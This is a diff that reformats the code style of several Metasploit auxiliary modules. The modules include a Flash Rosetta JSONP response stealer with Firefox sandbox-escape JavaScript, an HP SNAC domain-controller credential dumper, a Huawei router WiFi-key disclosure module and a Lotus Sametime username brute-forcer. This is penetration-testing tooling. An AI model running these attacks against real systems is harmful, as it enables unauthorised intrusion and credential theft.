+          document.documentElement.appendChild(object);
+        } else {
+          this.contentWindow.location.reload();
        }
      }
-    }
-  }
-  return data;
-}

-function _(s, template, value) {
-  s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
-  s = s.substring(0, s.length - 1);
-  if (template && value) {
-    s = s.replace(template, value);
-  }
-  s += __proto;
-  s += xml2string;
-  s += get_data;
-  s = s.replace(/\\s\\/\\/.*\\n/g, "");
-  s = s + ";undefined";
-  return s;
-}
-
-function get_sandbox_context() {
-  if (window.my_win_id == null) {
-    for (var i = 0; i < 20; i++) {
-      try {
-        if (window[i].location.toString().indexOf("view-source:") != -1) {
-          my_win_id = i;
-          break;
+      var kill = setInterval(function() {
+        if (window.sandboxContext) {
+          clearInterval(kill);
+        } else {
+          return;
        }
-      } catch (e) {}
-    }
-  };
-  if (window.my_win_id == null)
-    return;
-  clearInterval(sandbox_context_i);
-  object.data = 'view-source:' + blobURL;
-  window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
-  object.data = 'data:text/html,<'+'html/>';
-  window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
-    '"position:absolute; left:-9999px;" onload = "'+_(function(){
-    window.wrappedJSObject.sandboxContext=(function(cmd) {
-      with(importFunction.constructor('return this')()) {
-        return eval(cmd);
-      }
-    });
-  }) + '"/>');
-}
-
-
-var i = document.createElement("iframe");
-i.id = "i";
-i.width=i.height=0;
-i.style='position:absolute;left:-9999px;';
-i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
-document.documentElement.appendChild(i);
-i.onload = function() {
-  if (this.contentDocument.styleSheets.length > 0) {
-    var i2 = document.createElement("iframe");
-    i2.id = "i2";
-    i2.width=i2.height=0;
-    i2.style='position:absolute;left:-9999px;';
-    i2.src = "data:application/pdf,";
-    document.documentElement.appendChild(i2);
-    pdfBlob = new Blob([''], {
-        type: 'application/pdf'
-    });
-    blobURL = URL.createObjectURL(pdfBlob);
-    object = document.createElement('object');
-    object.data = 'data:application/pdf,';
-    object.onload = (function() {
-        sandbox_context_i = setInterval(get_sandbox_context, 200);
-        object.onload = null;
-        object.data = 'view-source:' + location.href;
-        return;
-    });
-    document.documentElement.appendChild(object);
-  } else {
-    this.contentWindow.location.reload();
-  }
-}
-
-var kill = setInterval(function() {
-  if (window.sandboxContext) {
-    clearInterval(kill);
-  } else {
-    return;
-  }
-EOJS
+    EOJS
  end
 end
@@ -10,33 +10,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
-      'Description'    => %q{
-        A website that serves a JSONP endpoint that accepts a custom alphanumeric
-        callback of 1200 chars can be abused to serve an encoded swf payload that
-        steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
+    super(
+      update_info(
+        info,
+        'Name' => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
+        'Description' => %q{
+          A website that serves a JSONP endpoint that accepts a custom alphanumeric
+          callback of 1200 chars can be abused to serve an encoded swf payload that
+          steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.

-        This module spins up a web server that, upon navigation from a user, attempts
-        to abuse the specified JSONP endpoint URLs by stealing the response from
-        GET requests to STEAL_URLS.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
-        'joev' # metasploit module
-      ],
-      'References'     =>
-        [
+          This module spins up a web server that, upon navigation from a user, attempts
+          to abuse the specified JSONP endpoint URLs by stealing the response from
+          GET requests to STEAL_URLS.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
+          'joev' # metasploit module
+        ],
+        'References' => [
          ['CVE', '2014-4671'],
          ['URL', 'http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/'],
          ['URL', 'https://github.com/mikispag/rosettaflash'],
          ['URL', 'https://www.quaxio.com/jsonp_handcrafted_flash_files/']
        ],
-      'DisclosureDate' => '2014-07-08',
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer'))
+        'DisclosureDate' => '2014-07-08',
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -46,7 +54,8 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('STEAL_URLS', [ true, 'A comma-separated list of URLs to steal', '' ]),
        OptString.new('URIPATH', [ true, 'The URI path to serve the exploit under', '/' ])
      ],
-      self.class)
+      self.class
+    )
  end

  def run
@@ -81,7 +90,7 @@ class MetasploitModule < Msf::Auxiliary
      file = store_loot(
        "html", "text/plain", cli.peerhost, body, "flash_jsonp_rosetta", "Exfiltrated HTTP response"
      )
-      url = body.lines.first.gsub(/.*?=/,'')
+      url = body.lines.first.gsub(/.*?=/, '')
      print_good "#{body.length} bytes captured from target #{cli.peerhost} on URL:\n#{url}"
      print_good "Stored in #{file}"
    else
@@ -96,7 +105,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def exploit_html
-    ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/')+'/'+Rex::Text.rand_text_alphanumeric(6+rand(20))+'.log')
+    ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/') + '/' + Rex::Text.rand_text_alphanumeric(6 + rand(20)) + '.log')
    %Q|
      <!doctype html>
      <html>
@@ -15,21 +15,22 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        => 'HP Operations Manager Perfd Environment Scanner',
+      'Name' => 'HP Operations Manager Perfd Environment Scanner',
      'Description' => %q{
        This module will enumerate the process list of a remote machine by abusing
        HP Operation Manager's unauthenticated 'perfd' daemon.
        },
-      'Author'      => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
-      'License'     => MSF_LICENSE
+      'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
+      'License' => MSF_LICENSE
    )

    commands_help = ALLOWED_COMMANDS.join(',')
    register_options(
-    [
-      Opt::RPORT(5227),
-      OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
-    ])
+      [
+        Opt::RPORT(5227),
+        OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
+      ]
+    )
  end

  def commands
@@ -48,7 +49,6 @@ class MetasploitModule < Msf::Auxiliary

  def run_host(target_host)
    begin
-
      connect
      banner_resp = sock.get_once
      if banner_resp && banner_resp =~ /^Welcome to the perfd server/
@@ -10,37 +10,43 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'HP ProCurve SNAC Domain Controller Credential Dumper',
-      'Description'    => %q{
-        This module will extract Domain Controller credentials from vulnerable installations of HP
-        SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
-        has been used to exploit remote file uploads. This vulnerability can be used to gather important
-        information handled by the vulnerable application, like plain text domain controller
-        credentials. This module has been tested successfully with HP SNAC included with ProCurve
-        Manager 4.0.
-      },
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'HP ProCurve SNAC Domain Controller Credential Dumper',
+        'Description' => %q{
+          This module will extract Domain Controller credentials from vulnerable installations of HP
+          SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
+          has been used to exploit remote file uploads. This vulnerability can be used to gather important
+          information handled by the vulnerable application, like plain text domain controller
+          credentials. This module has been tested successfully with HP SNAC included with ProCurve
+          Manager 4.0.
+        },
+        'References' => [
          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409']
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'rgod <rgod[at]autistici.org>', # Auth bypass discovered by
          'juan vazquez' # Metasploit module
        ],
-      'License'        => MSF_LICENSE,
-      'DefaultOptions' =>
-        {
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
          'SSL' => true,
        },
-      'DisclosureDate' => '2013-09-09'
-    ))
+        'DisclosureDate' => '2013-09-09',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(443)
-      ])
+      ]
+    )
  end

  def get_domain_info(session)
@@ -86,7 +92,6 @@ class MetasploitModule < Msf::Auxiliary
    return results
  end

-
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
@@ -113,9 +118,7 @@ class MetasploitModule < Msf::Auxiliary
    create_credential_login(login_data)
  end

-
  def run
-
    print_status("Get Domain Info")
    session = get_session

@@ -141,8 +144,8 @@ class MetasploitModule < Msf::Auxiliary
    end

    cred_table = Rex::Text::Table.new(
-      'Header'  => 'Domain Controllers Credentials',
-      'Indent'  => 1,
+      'Header' => 'Domain Controllers Credentials',
+      'Indent' => 1,
      'Columns' => ['Domain Controller', 'Username', 'Password']
    )

@@ -160,6 +163,5 @@ class MetasploitModule < Msf::Auxiliary

    print_line
    print_line(cred_table.to_s)
-
  end
 end
@@ -8,30 +8,39 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Gather PDF Authors',
-      'Description' => %q{
-        This module downloads PDF documents and extracts the author's
-        name from the document metadata.
+    super(
+      update_info(
+        info,
+        'Name' => 'Gather PDF Authors',
+        'Description' => %q{
+          This module downloads PDF documents and extracts the author's
+          name from the document metadata.

-        This module expects a URL to be provided using the URL option.
-        Alternatively, multiple URLs can be provided by supplying the
-        path to a file containing a list of URLs in the URL_LIST option.
+          This module expects a URL to be provided using the URL option.
+          Alternatively, multiple URLs can be provided by supplying the
+          path to a file containing a list of URLs in the URL_LIST option.

-        The URL_TYPE option is used to specify the type of URLs supplied.
+          The URL_TYPE option is used to specify the type of URLs supplied.

-        By specifying 'pdf' for the URL_TYPE, the module will treat
-        the specified URL(s) as PDF documents. The module will
-        download the documents and extract the authors' names from the
-        document metadata.
+          By specifying 'pdf' for the URL_TYPE, the module will treat
+          the specified URL(s) as PDF documents. The module will
+          download the documents and extract the authors' names from the
+          document metadata.

-        By specifying 'html' for the URL_TYPE, the module will treat
-        the specified URL(s) as HTML pages. The module will scrape the
-        pages for links to PDF documents, download the PDF documents,
-        and extract the author's name from the document metadata.
-      },
-      'License'     => MSF_LICENSE,
-      'Author'      => 'bcoles'))
+          By specifying 'html' for the URL_TYPE, the module will treat
+          the specified URL(s) as HTML pages. The module will scrape the
+          pages for links to PDF documents, download the PDF documents,
+          and extract the author's name from the document metadata.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'bcoles',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    deregister_http_client_options

@@ -41,7 +50,8 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('URL_LIST', [ false, 'File containing a list of target URLs', '' ]),
        OptEnum.new('URL_TYPE', [ true, 'The type of URL(s) specified', 'html', [ 'pdf', 'html' ] ]),
        OptBool.new('STORE_LOOT', [ false, 'Store authors in loot', true ])
-      ])
+      ]
+    )
  end

  def progress(current, total)
@@ -147,8 +157,10 @@ class MetasploitModule < Msf::Auxiliary
    pdf_urls = []
    urls.each_with_index do |url, index|
      next if url.blank?
+
      html = download url
      next if html.blank?
+
      doc = Nokogiri::HTML html
      doc.search('a[href]').select { |n| n['href'][/(\.pdf$|\.pdf\?)/] }.map do |n|
        pdf_urls << URI.join(url, n['href']).to_s
@@ -166,8 +178,10 @@ class MetasploitModule < Msf::Auxiliary
    max_len = 256
    urls.each_with_index do |url, index|
      next if url.blank?
+
      file = download url
      next if file.blank?
+
      pdf = StringIO.new
      pdf.puts file
      author = read pdf
@@ -10,73 +10,80 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  BASIC_INFO = {
-    'Device Name'      => /<DeviceName>(.*)<\/DeviceName>/i,
-    'Serial Number'    => /<SerialNumber>(.*)<\/SerialNumber>/i,
-    'IMEI'             => /<Imei>(.*)<\/Imei>/i,
-    'IMSI'             => /<Imsi>(.*)<\/Imsi>/i,
-    'ICCID'            => /<Iccid>(.*)<\/Iccid>/i,
+    'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i,
+    'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i,
+    'IMEI' => /<Imei>(.*)<\/Imei>/i,
+    'IMSI' => /<Imsi>(.*)<\/Imsi>/i,
+    'ICCID' => /<Iccid>(.*)<\/Iccid>/i,
    'Hardware Version' => /<HardwareVersion>(.*)<\/HardwareVersion>/i,
    'Software Version' => /<SoftwareVersion>(.*)<\/SoftwareVersion>/i,
-    'WebUI Version'    => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
-    'Mac Address1'     => /<MacAddress1>(.*)<\/MacAddress1>/i,
-    'Mac Address2'     => /<MacAddress2>(.*)<\/MacAddress2>/i,
-    'Product Family'   => /<ProductFamily>(.*)<\/ProductFamily>/i,
-    'Classification'   => /<Classify>(.*)<\/Classify>/i
+    'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
+    'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i,
+    'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i,
+    'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i,
+    'Classification' => /<Classify>(.*)<\/Classify>/i
  }

  WAN_INFO = {
    'Wan IP Address' => /<WanIPAddress>(.*)<\/WanIPAddress>/i,
-    'Primary Dns'    => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
-    'Secondary Dns'  => /<SecondaryDns>(.*)<\/SecondaryDns>/i
+    'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
+    'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i
  }

-  DHCP_INFO ={
-    'LAN IP Address'      => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
+  DHCP_INFO = {
+    'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
    'DHCP StartIPAddress' => /<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i,
-    'DHCP EndIPAddress'   => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
-    'DHCP Lease Time'     => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
+    'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
+    'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
  }

  WIFI_INFO = {
-    'Wifi WPA pre-shared key'     => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
-    'Wifi Auth mode'              => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
+    'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
+    'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
    'Wifi Basic encryption modes' => /<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i,
-    'Wifi WPA Encryption Modes'   => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
-    'Wifi WEP Key1'               => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
-    'Wifi WEP Key2'               => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
-    'Wifi WEP Key3'               => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
-    'Wifi WEP Key4'               => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
-    'Wifi WEP Key Index'          => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
+    'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
+    'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
+    'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
+    'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
+    'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
+    'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
  }

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Huawei Datacard Information Disclosure Vulnerability",
-      'Description'    => %q{
-        This module exploits an unauthenticated information disclosure vulnerability in Huawei
-        SOHO routers. The module will gather information by accessing the /api pages where
-        authentication is not required, allowing configuration changes as well as information
-        disclosure, including any stored SMS.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Huawei Datacard Information Disclosure Vulnerability",
+        'Description' => %q{
+          This module exploits an unauthenticated information disclosure vulnerability in Huawei
+          SOHO routers. The module will gather information by accessing the /api pages where
+          authentication is not required, allowing configuration changes as well as information
+          disclosure, including any stored SMS.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Jimson K James',
          'Tom James <tomsmaily[at]aczire.com>', # Msf module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CWE', '425'],
          ['CVE', '2013-6031'],
          ['US-CERT-VU', '341526']
        ],
-      'DisclosureDate' => '2013-11-11' ))
+        'DisclosureDate' => '2013-11-11',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RHOST('mobilewifi.home')
-      ])
-
+      ]
+    )
  end

  # Gather basic router information
@@ -93,13 +100,13 @@ class MetasploitModule < Msf::Auxiliary
  end

  def get_wifi_info
-
    print_status("Getting WiFi Key details...")
    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/wlan/security-settings',
-      })
+        'method' => 'GET',
+        'uri' => '/api/wlan/security-settings',
+      }
+    )

    unless is_target?(res)
      return
@@ -116,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
      log << "WiFi SSID: #{wifi_ssid}\n"
    end

-    WIFI_INFO.each do |k,v|
+    WIFI_INFO.each do |k, v|
      if resp_body.match(v)
        info = $1
        print_status("#{k}: #{info}")
@@ -132,13 +139,13 @@ class MetasploitModule < Msf::Auxiliary
  end

  def get_router_info
-
    print_status("Gathering basic device information...")
    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/device/information',
-      })
+        'method' => 'GET',
+        'uri' => '/api/device/information',
+      }
+    )

    unless is_target?(res)
      return
@@ -148,7 +155,7 @@ class MetasploitModule < Msf::Auxiliary

    print_status("Basic Information")

-    BASIC_INFO.each do |k,v|
+    BASIC_INFO.each do |k, v|
      if resp_body.match(v)
        info = $1
        print_status("#{k}: #{info}")
@@ -161,9 +168,10 @@ class MetasploitModule < Msf::Auxiliary

    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/wlan/basic-settings',
-      })
+        'method' => 'GET',
+        'uri' => '/api/wlan/basic-settings',
+      }
+    )

    # check whether we got any response from server and proceed.
    unless is_target?(res)
@@ -184,9 +192,10 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Gathering MAC filters...")
    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/wlan/mac-filter',
-      })
+        'method' => 'GET',
+        'uri' => '/api/wlan/mac-filter',
+      }
+    )

    unless is_target?(res)
      return
@@ -198,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary

    if resp_body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i)
      wifi_mac_filter_status = $1
-      print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}" )
+      print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}")
    end

    (0..9).each do |i|
@@ -215,9 +224,10 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Gathering WAN information...")
    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/monitoring/status',
-      })
+        'method' => 'GET',
+        'uri' => '/api/monitoring/status',
+      }
+    )

    unless is_target?(res)
      return
@@ -227,7 +237,7 @@ class MetasploitModule < Msf::Auxiliary

    print_status('WAN Details')

-    WAN_INFO.each do |k,v|
+    WAN_INFO.each do |k, v|
      if resp_body.match(v)
        info = $1
        print_status("#{k}: #{info}")
@@ -239,9 +249,10 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Gathering DHCP information...")
    res = send_request_raw(
      {
-        'method'  => 'GET',
-        'uri'     => '/api/dhcp/settings',
-      })
+        'method' => 'GET',
+        'uri' => '/api/dhcp/settings',
+      }
+    )

    unless is_target?(res)
      return
@@ -261,7 +272,7 @@ class MetasploitModule < Msf::Auxiliary
      return
    end

-    DHCP_INFO.each do |k,v|
+    DHCP_INFO.each do |k, v|
      if resp_body.match(v)
        info = $1
        print_status("#{k}: #{info}")
@@ -8,32 +8,37 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'  => 'IBM BigFix Relay Server Sites and Package Enum',
-      'Description' => %q{
-        This module retrieves masthead, site, and available package information
-        from IBM BigFix Relay Servers.
-      },
-      'Author' =>
-        [
-          'HD Moore',       # Vulnerability Discovery
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
+        'Description' => %q{
+          This module retrieves masthead, site, and available package information
+          from IBM BigFix Relay Servers.
+        },
+        'Author' => [
+          'HD Moore', # Vulnerability Discovery
          'Chris Bellows',  # Vulnerability Discovery
          'Ryan Hanson',    # Vulnerability Discovery
          'Jacob Robles'    # Metasploit module
        ],
-      'References' =>
-        [
-          ['CVE','2019-4061'],
-          ['URL','https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
+        'References' => [
+          ['CVE', '2019-4061'],
+          ['URL', 'https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'RPORT' => 52311,
-          'SSL'   => true
+          'SSL' => true
        },
-      'License' => MSF_LICENSE,
-      'DisclosureDate' => '2019-03-18' # Blog post date
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2019-03-18',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    ) # Blog post date

    register_options [
      OptString.new('TARGETURI', [true, 'Path to the BigFix server', '/']),
@@ -115,6 +120,7 @@ class MetasploitModule < Msf::Auxiliary
    print_status('Downloading packages')
    @files.each do |action, val|
      next if val.empty?
+
      res = send_req("bfmirror/downloads/#{action}/0")
      next unless res && res.code == 200

@@ -10,48 +10,55 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'IBM Lotus Notes Sametime User Enumeration',
-      'Description'    => %q{
-        This module extracts usernames using the IBM Lotus Notes Sametime web
-        interface using either a dictionary attack (which is preferred), or a
-        bruteforce attack trying all usernames of MAXDEPTH length or less.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Lotus Notes Sametime User Enumeration',
+        'Description' => %q{
+          This module extracts usernames using the IBM Lotus Notes Sametime web
+          interface using either a dictionary attack (which is preferred), or a
+          bruteforce attack trying all usernames of MAXDEPTH length or less.
+        },
+        'Author' => [
          'kicks4kittens' # Metasploit module
        ],
-      'References' =>
-        [
+        'References' => [
          [ 'CVE', '2013-3975' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'SSL' => true
        },
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2013-12-27'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2013-12-27',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']),
-         OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
+        OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
        OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
-        OptPath.new('DICT', [ false,  'Path to dictionary file to use', '']),
-        OptInt.new('MAXDEPTH', [ true,  'Maximum depth to check during bruteforce', 2])
-      ])
+        OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
+        OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
+      ]
+    )

    register_advanced_options(
      [
        OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]),
-        OptString.new('PREFIX', [ false,  'Defines set prefix for each guess (e.g. user)', '']),
-        OptString.new('SUFFIX', [ false,  'Defines set post for each guess (e.g. _adm)', '']),
-        OptInt.new('TIMING', [ true,  'Set pause between requests', 0]),
-        OptInt.new('Threads', [ true,  'Number of test threads', 10])
-      ])
+        OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
+        OptString.new('SUFFIX', [ false, 'Defines set post for each guess (e.g. _adm)', '']),
+        OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
+        OptInt.new('Threads', [ true, 'Number of test threads', 10])
+      ]
+    )
  end

  def setup
@@ -73,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
      end

      if datastore['SpecialChars']
-        datastore['SpecialChars'].chars do | spec |
+        datastore['SpecialChars'].chars do |spec|
          @charset.push(Rex::Text.uri_encode(spec))
        end
      end
@@ -108,13 +115,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['TYPE'] == "UID"
      random_val = Rex::Text.rand_text_alpha(32)
    else
-      random_val = Rex::Text.rand_text_alpha(32) +"@"+ Rex::Text.rand_text_alpha(16) + ".com"
+      random_val = Rex::Text.rand_text_alpha(32) + "@" + Rex::Text.rand_text_alpha(16) + ".com"
    end

    res = send_request_cgi({
-      'uri'     =>  normalize_uri(target_uri.path),
-      'method'  => 'GET',
-      'ctype'   => 'text/html',
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'ctype' => 'text/html',
      'vars_get' => {
        'mode' => datastore['TYPE'].downcase,
        'searchText' => random_val
@@ -187,11 +194,10 @@ class MetasploitModule < Msf::Auxiliary
            end
          end
        end
-      t.each {|x| x.join }
-
+        t.each { |x| x.join }
      rescue ::Timeout::Error
      ensure
-        t.each {|x| x.kill rescue nil }
+        t.each { |x| x.kill rescue nil }
      end
    end
  end
@@ -206,9 +212,9 @@ class MetasploitModule < Msf::Auxiliary
    end

    res = send_request_cgi({
-      'uri'     =>  normalize_uri(target_uri.path),
-      'method'  => 'GET',
-      'ctype'   => 'text/html',
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'ctype' => 'text/html',
      'vars_get' => {
        'mode' => datastore['TYPE'].downcase,
        'searchText' => tstring
@@ -256,7 +262,7 @@ class MetasploitModule < Msf::Auxiliary
  # To find all users the queue must be extended by adding 'aa' through to 'az'
  def extend_queue(test_current)
    if test_current.length < datastore['MAXDEPTH']
-      @charset.each do | char |
+      @charset.each do |char|
        @test_queue.push(test_current + char)
      end
    elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
@@ -267,12 +273,12 @@ class MetasploitModule < Msf::Auxiliary

  def report_user(username)
    report_note(
-      :host   => rhost,
-      :port   => rport,
-      :proto  => 'tcp',
-      :sname  => 'sametime',
-      :type   => 'ibm_lotus_sametime_user',
-      :data   => { :username => username },
+      :host => rhost,
+      :port => rport,
+      :proto => 'tcp',
+      :sname => 'sametime',
+      :type => 'ibm_lotus_sametime_user',
+      :data => { :username => username },
      :update => :unique_data
    )
  end
@@ -282,18 +288,19 @@ class MetasploitModule < Msf::Auxiliary

    user_tbl = Msf::Ui::Console::Table.new(
      Msf::Ui::Console::Table::Style::Default,
-      'Header'  => "IBM Lotus Sametime Users",
-      'Prefix'  => "\n",
-      'Indent'  => 1,
-      'Columns'   =>
+      'Header' => "IBM Lotus Sametime Users",
+      'Prefix' => "\n",
+      'Indent' => 1,
+      'Columns' =>
      [
        "UID",
        "Email",
        "CommonName"
-      ])
+      ]
+    )

    # populate tables
-    @user_data.each do | line |
+    @user_data.each do |line|
      user_tbl << [ line[0], line[1], line[2] ]
    end

